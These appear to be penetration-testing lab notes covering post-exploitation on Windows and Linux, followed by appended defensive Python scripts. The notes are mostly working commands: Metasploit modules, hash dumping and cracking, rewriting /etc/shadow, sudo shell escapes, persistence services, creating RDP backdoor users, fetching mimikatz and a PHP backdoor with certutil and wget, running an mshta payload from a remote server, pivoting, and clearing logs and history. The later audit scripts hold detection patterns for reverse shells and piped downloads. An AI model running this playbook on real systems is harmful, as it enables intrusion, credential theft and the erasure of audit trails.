Post Exploitation

  • enumerating windows system information
    • scan the target: nmap -sV demo.ine.local
    • find a matching exploit: searchsploit rejetto, then exploit with use exploit/windows/http/rejetto_hfs_exec
    • Meterpreter commands: sysinfo, then shell followed by hostname and systeminfo
    • detailed hotfix information, useful for pinning down the exact Windows build: wmic qfe get Caption,Description,HotFixID,InstalledOn
  • enumerating windows users and groups
    • Meterpreter commands: getuid, getprivs
    • post module: background the session, then use post/windows/gather/enum_logged_on_users and set SESSION 1
    • check current privileges: whoami /priv
    • check users: net users, net user administrator
    • check groups: net localgroup, net localgroup administrators
  • enumerating windows network information
    • cmd commands: ipconfig, ipconfig /all, route print, arp -a, netstat -ano
  • enumerating processes and services
    • Meterpreter commands: ps, pgrep explorer.exe, migrate 2252
    • check services: net start, with details from wmic service list brief
    • check tasks: tasklist /SVC, schtasks /query /fo LIST
  • automating windows local enumeration
    • enumerate privileges: use post/windows/gather/win_privs
    • logged-on users: use post/windows/gather/enum_logged_on_users
    • check whether the target is a VM: use post/windows/gather/checkvm
    • installed applications: use post/windows/gather/enum_applications
    • domain computers: use post/windows/gather/enum_computers
    • installed patches: use post/windows/gather/enum_patches
    • JAWS (https://github.com/411Hall/JAWS): upload the script with upload /root/Desktop/jaws-enum.ps1
    • run it: powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt, then retrieve the report with download JAWS-Enum.txt
  • enumerating linux system information
    • commands: sysinfo, hostname, cat /etc/issue, cat /etc/*release, uname -a, lscpu, df -h
  • enumerating linux users and groups
    • user and group information: getuid, whoami, groups root, cat /etc/passwd, groups, who, lastlog
  • enumerating linux network information
    • commands: ifconfig, netstat, route, cat /etc/networks, cat /etc/hosts, cat /etc/resolv.conf
  • enumerating processes and cronjobs
    • commands: ps, pgrep vsftpd, ls -al /etc/cron*
  • automating linux local enumeration
    • background the session, then load the post modules
    • configuration files: use post/linux/gather/enum_configs
    • network information: use post/linux/gather/enum_network
    • system information: use post/linux/gather/enum_system
    • LinEnum: https://github.com/rebootuser/LinEnum
  • setting up a web server with python
    • command: python -m SimpleHTTPServer 80 (Python 2; the Python 3 equivalent is python3 -m http.server 80)
  • transferring files to windows targets
    • serve with python3 -m http.server 80, then fetch on the target: certutil -urlcache -f http://10.10.31.3/mimikatz.exe mimikatz.exe
  • transferring files to linux targets
    • serve with python3 -m http.server 80, then fetch on the target: wget http://192.217.117.2/php-backdoor.php
  • upgrading non-interactive shells
    • with bash: /bin/bash -i
    • with python: python -c 'import pty; pty.spawn("/bin/bash")'
  • windows privesc check
    • change to the script folder: cd C:\Users\student\Desktop\PrivescCheck
    • run the script: powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
    • use the recovered credentials: runas.exe /user:administrator cmd
    • start an HTA server with use exploit/windows/misc/hta_server, then execute the payload on the target: mshta.exe http://10.10.31.2:8080/Rv4eiCTge85UJ15.hta
  • permissions matter!
    • check for world-writable files: find / -not -type l -perm -o+w
    • generate a password hash for the root user with openssl passwd -1 -salt abc password, then add the generated entry to the writable file: vim /etc/shadow
  • editing gone wrong
    • check SUID binaries: find / -user root -perm -4000 -exec ls -ldb {} \;
    • check sudo rules: sudo -l
    • launch man through sudo and spawn a shell from the pager prompt: sudo man ls, then type !/bin/bash
  • maintaining access, persistence service
    • use exploit/windows/local/persistence_service to get a new session whenever the victim reboots
  • maintaining access, rdp
    • migrate to gain privileges: getuid, ps -S explorer.exe, migrate 2764
    • in Meterpreter: run getgui -e -u alice -p hack_123321, then log in with xfreerdp /u:alice /p:hack_123321 /v:demo.ine.local
  • maintaining access I
    • copy the ssh private key: scp student@demo.ine.local:~/.ssh/id_rsa .
    • log in with the private key: chmod 400 id_rsa, then ssh -i id_rsa student@demo.ine.local
  • local job scheduling
    • create a cronjob that starts an http server: echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron, then crontab -i cron and verify with crontab -l
  • windows ntlm hash cracking
    • migrate into lsass.exe: migrate -N lsass.exe
    • dump the hashes: hashdump
    • verify the hashes were stored: background the session, then creds
    • crack the hashes: use auxiliary/analyze/crack_windows and set CUSTOM_WORDLIST /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  • linux password cracking
    • start the database: /etc/init.d/postgresql start
    • dump the linux hashes: use post/linux/gather/hashdump
    • crack the hashes: use auxiliary/analyze/crack_linux and set SHA512 true
  • pivoting
    • use ipconfig to find the internal subnet reachable from the compromised host, then add a route through the session: run autoroute -s 10.0.16.0/20
    • the routed subnet can now be scanned with use auxiliary/scanner/portscan/tcp
    • set up port forwarding: portfwd add -l 1234 -p 80 -r demo2.ine.local
  • clearing your own tracks on windows
    • clear the event logs: clearev
  • clearing your own tracks on linux
    • clear the shell history: history -c
    • empty the bash history file: cat /dev/null > ~/.bash_history
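
The hotfix listing in the "enumerating windows system information" section (wmic qfe get Caption,Description,HotFixID,InstalledOn) is a fixed-width table, and the same output is what a defender uses to check a host's patch state. The following is an added example, not part of these notes, that parses that table by the header's column offsets and answers the two questions that matter: which required KBs are absent and how long ago the host was last patched. The sample output and the KB numbers in it are constructed placeholders, and the 90-day staleness threshold is an assumed policy value.

```python
"""Audit the output of `wmic qfe get Caption,Description,HotFixID,InstalledOn`.

wmic prints a fixed-width table whose columns line up under the header, so the
header's column offsets are used to slice every row. Real output ends lines in
"\\r\\r\\n", which is why each line is rstrip("\\r")-ed before use.
"""
from datetime import date, datetime


def _column_bounds(header):
    """Return (name, start, end) slices for each header column."""
    names = header.split()
    starts = [header.index(name) for name in names]
    ends = starts[1:] + [None]
    return list(zip(names, starts, ends))


def _parse_install_date(text):
    """wmic prints InstalledOn as M/D/YYYY on English locales; tolerate blanks."""
    for fmt in ("%m/%d/%Y", "%Y-%m-%d"):
        try:
            return datetime.strptime(text, fmt).date()
        except ValueError:
            continue
    return None


def parse_qfe(text):
    """Turn wmic qfe output into a list of dicts with a parsed InstalledOn date."""
    lines = [ln.rstrip("\r") for ln in text.splitlines()]
    lines = [ln for ln in lines if ln.strip()]
    if not lines:
        return []
    bounds = _column_bounds(lines[0])
    records = []
    for line in lines[1:]:
        record = {name: line[start:end].strip() for name, start, end in bounds}
        record["InstalledOn"] = _parse_install_date(record["InstalledOn"])
        records.append(record)
    return records


def latest_install(records):
    """Most recent InstalledOn date, or None if no row carried a date."""
    dates = [r["InstalledOn"] for r in records if r["InstalledOn"]]
    return max(dates) if dates else None


def missing_hotfixes(records, required):
    """Required KB ids that do not appear in the listing."""
    installed = {r["HotFixID"] for r in records}
    return sorted(set(required) - installed)


def is_stale(records, today=None, max_age_days=90):
    """True when no hotfix was installed within max_age_days of today (assumed policy)."""
    if today is None:
        today = date.today()
    elif isinstance(today, str):
        today = date.fromisoformat(today)
    latest = latest_install(records)
    return latest is None or (today - latest).days > max_age_days


def _row(caption, description, hotfix, installed):
    # Pad columns the way wmic does, so the sample lines up like real output.
    return caption.ljust(44) + description.ljust(17) + hotfix.ljust(11) + installed


# Constructed sample output; the KB numbers are placeholders, not real updates.
SAMPLE_QFE = "\r\r\n".join([
    _row("Caption", "Description", "HotFixID", "InstalledOn"),
    _row("http://support.microsoft.com/?kbid=9000001", "Security Update", "KB9000001", "10/15/2020"),
    _row("http://support.microsoft.com/?kbid=9000002", "Update", "KB9000002", "5/20/2020"),
    _row("http://support.microsoft.com/?kbid=9000003", "Security Update", "KB9000003", "2/10/2021"),
    "",
])

if __name__ == "__main__":
    recs = parse_qfe(SAMPLE_QFE)
    for r in recs:
        print(r["HotFixID"], r["Description"], r["InstalledOn"])
    print("latest install:", latest_install(recs))
    print("missing:", missing_hotfixes(recs, ["KB9000002", "KB9000009"]))
    print("stale as of 2021-09-01:", is_stale(recs, "2021-09-01"))
```

Slicing by header offsets rather than splitting on whitespace is what keeps the two-word "Security Update" description intact; a regex split on runs of spaces breaks as soon as a caption grows long enough to leave only one space before the next column.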
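
The "permissions matter!" and "editing gone wrong" sections both rest on two filesystem conditions: a sensitive file that is world-writable, and a root-owned SUID binary that should not exist. The following is an added example, not code from these notes, that audits a directory tree for exactly those conditions the way the two find commands do (symlinks skipped, SUID reported only for regular files), with an allowlist so the expected SUID binaries do not drown out the findings. The allowlist and the demo tree it builds under a temporary directory are constructed for the example.

```python
"""Audit a tree for world-writable entries and unexpected SUID executables,
mirroring `find / -not -type l -perm -o+w` and `find / -user root -perm -4000`."""
import os
import stat
import tempfile

# Constructed allowlist of SUID basenames that are expected on most distributions.
DEFAULT_SUID_ALLOWLIST = frozenset({"sudo", "passwd", "su", "mount", "umount", "chsh"})


def audit_tree(root, suid_allowlist=DEFAULT_SUID_ALLOWLIST):
    """Return {'world_writable': [...], 'suid': [...]} with paths relative to root."""
    findings = {"world_writable": [], "suid": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)            # lstat never follows symlinks
            if stat.S_ISLNK(st.st_mode):   # mirrors find's -not -type l
                continue
            rel = os.path.relpath(path, root)
            if st.st_mode & stat.S_IWOTH:  # -perm -o+w: "other" may write
                findings["world_writable"].append(rel)
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and name not in suid_allowlist):
                findings["suid"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def make_demo_tree():
    """Build a constructed tree with one of each finding; returns its root."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    for sub in ("etc", os.path.join("usr", "bin")):
        os.makedirs(os.path.join(root, sub))
        os.chmod(os.path.join(root, sub), 0o755)   # explicit, independent of umask
    shadow = os.path.join(root, "etc", "shadow")
    with open(shadow, "w") as fh:
        fh.write("root:*:18000:0:99999:7:::\n")    # constructed shadow line
    os.chmod(shadow, 0o666)                         # the "permissions matter" mistake
    # passwd is allowlisted, backup is an unexpected SUID binary, ls is plain.
    for name, mode in (("passwd", 0o4755), ("backup", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, "usr", "bin", name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    # A symlink's own mode is 0777; it must be skipped, not reported.
    os.symlink(shadow, os.path.join(root, "etc", "shadow-link"))
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    result = audit_tree(demo)
    print("world-writable:", result["world_writable"])
    print("unexpected SUID:", result["suid"])
```

Run against a real system it is invoked as audit_tree("/"), which walks the whole filesystem; the demo tree exists only so the checks can be exercised offline. Reporting a world-writable /etc/shadow is the defender's side of the password-entry trick in the notes: once a non-root user can append a line to that file, the root password is whatever they choose.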

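The "local job scheduling" entry installs a crontab line that runs every minute and starts an HTTP server, which is also the shape a defender looks for when reviewing crontab -l output for persistence. The following is an added example, not part of these notes, that parses a user crontab (comments, blank lines and VAR=value settings skipped), validates the five schedule fields, and flags every-minute or @reboot schedules together with commands that start a listener, spawn an interactive shell, or pipe a download into a shell. The indicator list and the sample crontab are constructed for the example.

```python
"""Review `crontab -l` output for persistence-style entries."""
import re

_ITEM = r"(\*|\d+|[A-Za-z]{3})(-(\d+|[A-Za-z]{3}))?(/\d+)?"
SCHEDULE_FIELD = re.compile(rf"^{_ITEM}(,{_ITEM})*$")  # e.g. *, */5, 1-5, 0,30, MON
SPECIAL_SCHEDULES = {"@reboot", "@hourly", "@daily", "@weekly", "@monthly", "@yearly", "@annually"}

# Constructed indicator list; extend it for your own environment.
SUSPICIOUS_COMMANDS = [
    (re.compile(r"SimpleHTTPServer|http\.server"), "starts an HTTP listener"),
    (re.compile(r"\bnc\b|\bncat\b|\bsocat\b"), "netcat/socat invocation"),
    (re.compile(r"bash -i|/dev/tcp/"), "interactive or reverse shell"),
    (re.compile(r"(curl|wget)[^|;]*\|\s*(ba)?sh"), "download piped to a shell"),
]


def parse_crontab(text):
    """Return (lineno, schedule_fields, command) for every job line."""
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue                                  # environment setting, not a job
        if line.startswith("@"):
            schedule, _, command = line.partition(" ")
            jobs.append((lineno, [schedule], command.strip()))
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            jobs.append((lineno, parts, ""))          # malformed: fewer than 5 fields + command
            continue
        jobs.append((lineno, parts[:5], parts[5]))
    return jobs


def audit_crontab(text):
    """Return a list of (lineno, reason, command) findings, in line order."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        if schedule[0] in SPECIAL_SCHEDULES:
            if schedule[0] == "@reboot":
                findings.append((lineno, "runs at every boot", command))
        elif len(schedule) != 5 or not all(SCHEDULE_FIELD.match(f) for f in schedule):
            findings.append((lineno, "malformed schedule", command))
            continue
        elif schedule == ["*"] * 5:
            findings.append((lineno, "runs every minute", command))
        for pattern, reason in SUSPICIOUS_COMMANDS:
            if pattern.search(command):
                findings.append((lineno, reason, command))
    return findings


# Constructed sample of what `crontab -l` might print on a reviewed host.
SAMPLE_CRONTAB = """\
# constructed sample crontab
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
* * * * * cd /home/student/ && python -m SimpleHTTPServer
@reboot /home/student/.cache/update.sh
30 2 * * 1-5 /usr/bin/curl -s http://updates.example.invalid/x.sh | sh
"""

if __name__ == "__main__":
    for lineno, reason, command in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {reason}: {command}")
```

The schedule check matters on its own: an every-minute job is the classic way to get a listener back within sixty seconds of it being killed, so "* * * * *" is reported even before the command is examined. System-wide crontabs under /etc/cron.d carry an extra user field between the schedule and the command, which this parser does not handle; they need the sixth token treated as the user.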
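The "clearing your own tracks on windows" entry (clearev) is the attacker's view; from the defender's side, clearing a Windows event log is itself logged: clearing the Security log writes Event ID 1102 from the Microsoft-Windows-Eventlog provider, and clearing the System or Application log writes Event ID 104 into the System log. Because clearev wipes all three logs in quick succession, a burst of these events from one account within a short window stands out from a lone administrative clear. The following is an added example, not part of these notes, that finds those events in exported records and groups them into bursts; the record layout and the sample events are constructed, and the 60-second window is an assumed tuning value.

```python
"""Detect Windows event-log clearing from exported event records."""
from datetime import datetime

EVENTLOG_PROVIDER = "Microsoft-Windows-Eventlog"
LOG_CLEAR_IDS = {1102: "Security log cleared", 104: "System/Application log cleared"}


def find_log_clears(events):
    """Return the events (sorted by time) whose ID signals a cleared log."""
    hits = [e for e in events
            if e["EventID"] in LOG_CLEAR_IDS and e["Provider"] == EVENTLOG_PROVIDER]
    return sorted(hits, key=lambda e: e["TimeCreated"])


def cluster_clears(clears, window_seconds=60):
    """Group consecutive clears by the same account that fall within
    window_seconds of the previous one; each group is a list of events."""
    groups = []
    for event in clears:
        ts = datetime.fromisoformat(event["TimeCreated"])
        if groups:
            last = groups[-1][-1]
            last_ts = datetime.fromisoformat(last["TimeCreated"])
            if last["User"] == event["User"] and (ts - last_ts).total_seconds() <= window_seconds:
                groups[-1].append(event)
                continue
        groups.append([event])
    return groups


def describe(events, window_seconds=60):
    """Human-readable findings; groups of two or more clears are marked BURST."""
    out = []
    for group in cluster_clears(find_log_clears(events), window_seconds):
        ids = [e["EventID"] for e in group]
        label = "BURST" if len(group) >= 2 else "single"
        out.append(f"{label}: {group[0]['User']} cleared logs starting "
                   f"{group[0]['TimeCreated']} (EventIDs {ids})")
    return out


# Constructed sample records; only the fields this check needs are kept.
SAMPLE_EVENTS = [
    {"TimeCreated": "2021-03-04T10:00:00", "Channel": "Security",
     "Provider": "Microsoft-Windows-Security-Auditing", "EventID": 4624, "User": "alice"},
    {"TimeCreated": "2021-03-04T10:02:11", "Channel": "Security",
     "Provider": EVENTLOG_PROVIDER, "EventID": 1102, "User": "alice"},
    {"TimeCreated": "2021-03-04T10:02:12", "Channel": "System",
     "Provider": EVENTLOG_PROVIDER, "EventID": 104, "User": "alice"},
    {"TimeCreated": "2021-03-04T10:02:13", "Channel": "System",
     "Provider": EVENTLOG_PROVIDER, "EventID": 104, "User": "alice"},
    {"TimeCreated": "2021-03-04T16:45:00", "Channel": "System",
     "Provider": EVENTLOG_PROVIDER, "EventID": 104, "User": "svc-backup"},
]

if __name__ == "__main__":
    for line in describe(SAMPLE_EVENTS):
        print(line)
```

Forwarding these events off the host is what makes the check useful: 1102 and 104 survive clearev only if they have already left for a collector, since the next clear would take them too.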
Written By

GitHub Contributor Team